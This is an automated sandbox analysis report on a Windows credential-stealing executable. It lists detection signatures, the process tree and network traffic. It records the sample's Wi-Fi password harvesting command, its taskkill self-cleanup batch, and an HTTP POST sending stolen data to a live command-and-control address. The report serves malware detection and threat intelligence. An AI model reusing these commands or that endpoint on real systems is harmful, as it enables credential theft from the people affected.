Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
bPkG0wTVon.exe

Overview

General Information

Sample name:bPkG0wTVon.exe
Analysis ID:1578055
MD5:36274aefe69f86532cee326b878f06ff
SHA1:6a33fb45bfa496c8559947640ae044b1d78d39b8
SHA256:24616a11af126a9d80991d575949abcef8b0e30b816a1ddc3e1d0f63fe380e89
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
.NET source code references suspicious native API functions
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
PE file contains section with special chars
Queries memory information (via WMI often done to detect virtual machines)
Queries pointing device information (via WMI, Win32_PointingDevice, often done to detect virtual machines)
Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive printer information (via WMI, Win32_Printer, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Uses netsh to modify the Windows network and firewall settings
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64native
  • bPkG0wTVon.exe (PID: 8592 cmdline: "C:\Users\user\Desktop\bPkG0wTVon.exe" MD5: 36274AEFE69F86532CEE326B878F06FF)
    • cmd.exe (PID: 7400 cmdline: "cmd.exe" /c tasklist MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 7288 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
    • cmd.exe (PID: 7384 cmdline: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • chcp.com (PID: 6548 cmdline: chcp 65001 MD5: 41146159AA3D41A92B53ED311EE15693)
      • netsh.exe (PID: 9252 cmdline: netsh wlan show profiles MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • findstr.exe (PID: 9260 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
    • cmd.exe (PID: 1560 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp6122.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp6122.tmp.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • chcp.com (PID: 3652 cmdline: chcp 65001 MD5: 41146159AA3D41A92B53ED311EE15693)
      • taskkill.exe (PID: 2132 cmdline: TaskKill /F /IM 8592 MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • timeout.exe (PID: 9728 cmdline: Timeout /T 2 /Nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
    • WerFault.exe (PID: 9760 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8592 -s 3592 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
bPkG0wTVon.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: bPkG0wTVon.exe PID: 8592JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.0.bPkG0wTVon.exe.120000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

          Sigma Signatures

          Stealing of Sensitive Information

          barindex
          Sigma detected: Capture Wi-Fi password
          Source: Process startedAuthor: Joe Security: Data: Command: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\bPkG0wTVon.exe", ParentImage: C:\Users\user\Desktop\bPkG0wTVon.exe, ParentProcessId: 8592, ParentProcessName: bPkG0wTVon.exe, ProcessCommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, ProcessId: 7384, ProcessName: cmd.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-19T08:26:14.011328+010028438561A Network Trojan was detected192.168.11.204971889.23.100.2331490TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: bPkG0wTVon.exeAvira: detected
          Multi AV Scanner detection for submitted file
          Source: bPkG0wTVon.exeVirustotal: Detection: 30%Perma Link
          Source: bPkG0wTVon.exeReversingLabs: Detection: 52%
          Machine Learning detection for sample
          Source: bPkG0wTVon.exeJoe Sandbox ML: detected
          Source: bPkG0wTVon.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: bPkG0wTVon.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: System.Xml.ni.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: C:\Users\Malware\source\repos\ConsoleApplication2\x64\Release\ConsoleApplication2.pdb source: bPkG0wTVon.exe
          Source: Binary string: C:\Users\Raifon\source\repos\Arcana\Arcana\bin\Release\Arcana.pdb source: bPkG0wTVon.exe
          Source: Binary string: System.ni.pdbRSDS source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\tdata source: bPkG0wTVon.exe, 00000000.00000002.1506746297.00000000076C9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Windows.Forms.ni.pdb source: bPkG0wTVon.exe, 00000000.00000002.1512294678.0000000070A0B000.00000020.00000001.01000000.00000007.sdmp, WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Management.pdbt source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Drawing.ni.pdb source: bPkG0wTVon.exe, 00000000.00000002.1524377559.0000000070BEB000.00000020.00000001.01000000.00000006.sdmp, WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Configuration.ni.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Net.Http.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Security.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Configuration.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Drawing.ni.pdbRSDS source: bPkG0wTVon.exe, 00000000.00000002.1524377559.0000000070BEB000.00000020.00000001.01000000.00000006.sdmp, WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Xml.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Xml.ni.pdbRSDS# source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Core.ni.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Windows.Forms.pdb source: bPkG0wTVon.exe, 00000000.00000002.1512294678.0000000070A0B000.00000020.00000001.01000000.00000007.sdmp, WERB95F.tmp.dmp.24.dr
          Source: Binary string: mscorlib.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*ata source: bPkG0wTVon.exe, 00000000.00000002.1506746297.00000000076C9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: bPkG0wTVon.exe, 00000000.00000002.1512294678.0000000070A0B000.00000020.00000001.01000000.00000007.sdmp, WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Net.Http.ni.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Management.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Drawing.pdb source: bPkG0wTVon.exe, 00000000.00000002.1524377559.0000000070BEB000.00000020.00000001.01000000.00000006.sdmp, WERB95F.tmp.dmp.24.dr
          Source: Binary string: mscorlib.ni.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Management.ni.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: Arcana.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Core.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Configuration.pdbH source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: mscorlib.ni.pdbRSDS] source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.pdbp source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: C:\Users\Malware\source\repos\ConsoleApplication2\x64\Release\ConsoleApplication2.pdb" source: bPkG0wTVon.exe
          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Net.Http.ni.pdbRSDS source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.ni.pdb source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Core.ni.pdbRSDS source: WERB95F.tmp.dmp.24.dr
          Source: Binary string: System.Web.pdb source: WERB95F.tmp.dmp.24.dr

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2843856 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2 : 192.168.11.20:49718 -> 89.23.100.233:1490
          Uses known network protocols on non-standard ports
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1490
          Source: unknownNetwork traffic detected: HTTP traffic on port 1490 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 1490 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 1490 -> 49718
          Yara detected Generic Downloader
          Source: Yara matchFile source: bPkG0wTVon.exe, type: SAMPLE
          Source: Yara matchFile source: 0.0.bPkG0wTVon.exe.120000.0.unpack, type: UNPACKEDPE
          Source: global trafficTCP traffic: 192.168.11.20:49718 -> 89.23.100.233:1490
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /upload HTTP/1.1Content-Type: multipart/form-data; boundary="6d617208-f1f4-415c-8f95-dec90f8a5da2"Host: 89.23.100.233:1490Content-Length: 133579Expect: 100-continueConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 89.23.100.233 89.23.100.233
          Source: Joe Sandbox ViewIP Address: 89.23.100.233 89.23.100.233
          Source: Joe Sandbox ViewIP Address: 104.16.184.241 104.16.184.241
          Source: Joe Sandbox ViewASN Name: MAXITEL-ASRU MAXITEL-ASRU
          Source: unknownDNS query: name: icanhazip.com
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: icanhazip.com
          Source: global trafficDNS traffic detected: DNS query: 245.246.1.0.in-addr.arpa
          Source: unknownHTTP traffic detected: POST /upload HTTP/1.1Content-Type: multipart/form-data; boundary="6d617208-f1f4-415c-8f95-dec90f8a5da2"Host: 89.23.100.233:1490Content-Length: 133579Expect: 100-continueConnection: Keep-Alive
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002A03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.100.233:1490
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.100.233:1490/upload
          Source: bPkG0wTVon.exeString found in binary or memory: http://89.23.100.233:1490/upload?File
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002A03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.100.233:1490t-
          Source: bPkG0wTVon.exe, 00000000.00000002.1512294678.00000000702F1000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://beta.visualstudio.net/net/sdk/feedback.asp
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Amcache.hve.24.drString found in binary or memory: http://upx.sf.net
          Source: tmp919C.tmp.dat.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: tmp919C.tmp.dat.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: tmp919C.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A16000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039D5000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039FF000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A3E000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, tmp919D.tmp.dat.0.dr, tmp918A.tmp.dat.0.dr, tmp919F.tmp.dat.0.dr, tmp9189.tmp.dat.0.dr, tmp9188.tmp.dat.0.dr, tmp919C.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: tmp919C.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: tmp919C.tmp.dat.0.drString found in binary or memory: https://gemini.google.com/app?q=
          Source: tmp919B.tmp.dat.0.drString found in binary or memory: https://login.live.com/
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002919000.00000004.00000800.00020000.00000000.sdmp, tmp919B.tmp.dat.0.drString found in binary or memory: https://login.live.com//
          Source: tmp919B.tmp.dat.0.drString found in binary or memory: https://login.live.com/https://login.live.com/
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002919000.00000004.00000800.00020000.00000000.sdmp, tmp919B.tmp.dat.0.drString found in binary or memory: https://login.live.com/v104
          Source: bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A16000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039D5000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039FF000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A3E000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, tmp919D.tmp.dat.0.dr, tmp918A.tmp.dat.0.dr, tmp919F.tmp.dat.0.dr, tmp9189.tmp.dat.0.dr, tmp9188.tmp.dat.0.dr, tmp919C.tmp.dat.0.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
          Source: bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A16000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039D5000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039FF000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A3E000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, tmp919D.tmp.dat.0.dr, tmp918A.tmp.dat.0.dr, tmp919F.tmp.dat.0.dr, tmp9189.tmp.dat.0.dr, tmp9188.tmp.dat.0.dr, tmp919C.tmp.dat.0.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A16000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039D5000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, tmp919D.tmp.dat.0.dr, tmp919F.tmp.dat.0.dr, tmp919C.tmp.dat.0.drString found in binary or memory: https://www.ecosia.org/newtab/
          Source: bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A16000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039D5000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, tmp919D.tmp.dat.0.dr, tmp919F.tmp.dat.0.dr, tmp919C.tmp.dat.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
          Source: bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039FF000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A3E000.00000004.00000800.00020000.00000000.sdmp, tmp918A.tmp.dat.0.dr, tmp9189.tmp.dat.0.dr, tmp9188.tmp.dat.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

          System Summary

          barindex
          PE file contains section with special chars
          Source: bPkG0wTVon.exeStatic PE information: section name: .\C3
          Source: bPkG0wTVon.exeStatic PE information: section name: ."@W
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D33E68 NtClose,0_2_04D33E68
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D34740 NtOpenFile,0_2_04D34740
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D34818 NtCreateSection,0_2_04D34818
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D349C0 NtMapViewOfSection,0_2_04D349C0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D34AB0 NtQueryVolumeInformationFile,0_2_04D34AB0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D343F8 NtAllocateVirtualMemory,0_2_04D343F8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D34B78 NtDeviceIoControlFile,0_2_04D34B78
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D34320 NtProtectVirtualMemory,0_2_04D34320
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D33E63 NtClose,0_2_04D33E63
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D3473B NtOpenFile,0_2_04D3473B
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D34810 NtCreateSection,0_2_04D34810
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D349B8 NtMapViewOfSection,0_2_04D349B8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D34AA9 NtQueryVolumeInformationFile,0_2_04D34AA9
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D343F3 NtAllocateVirtualMemory,0_2_04D343F3
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D34B70 NtDeviceIoControlFile,0_2_04D34B70
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D34318 NtProtectVirtualMemory,0_2_04D34318
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D34B78: NtDeviceIoControlFile,0_2_04D34B78
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_026ABAE00_2_026ABAE0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_026A93100_2_026A9310
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_026A10980_2_026A1098
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_026AB1B80_2_026AB1B8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_026A8EC80_2_026A8EC8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_026A97000_2_026A9700
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_026ABD680_2_026ABD68
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_026AD5E80_2_026AD5E8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_026ABAD10_2_026ABAD1
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_026AF3B10_2_026AF3B1
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_026AB83B0_2_026AB83B
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_026A10890_2_026A1089
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_026A9E400_2_026A9E40
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_026A8EB80_2_026A8EB8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_026A9F690_2_026A9F69
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_026AD5E80_2_026AD5E8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D34C500_2_04D34C50
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D3CE000_2_04D3CE00
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D36F980_2_04D36F98
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D3E7330_2_04D3E733
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D320C00_2_04D320C0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D309900_2_04D30990
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D333980_2_04D33398
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D314D00_2_04D314D0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D364D80_2_04D364D8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D364C80_2_04D364C8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D31C900_2_04D31C90
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D314A30_2_04D314A3
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D34C400_2_04D34C40
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_04D3CDFB0_2_04D3CDFB
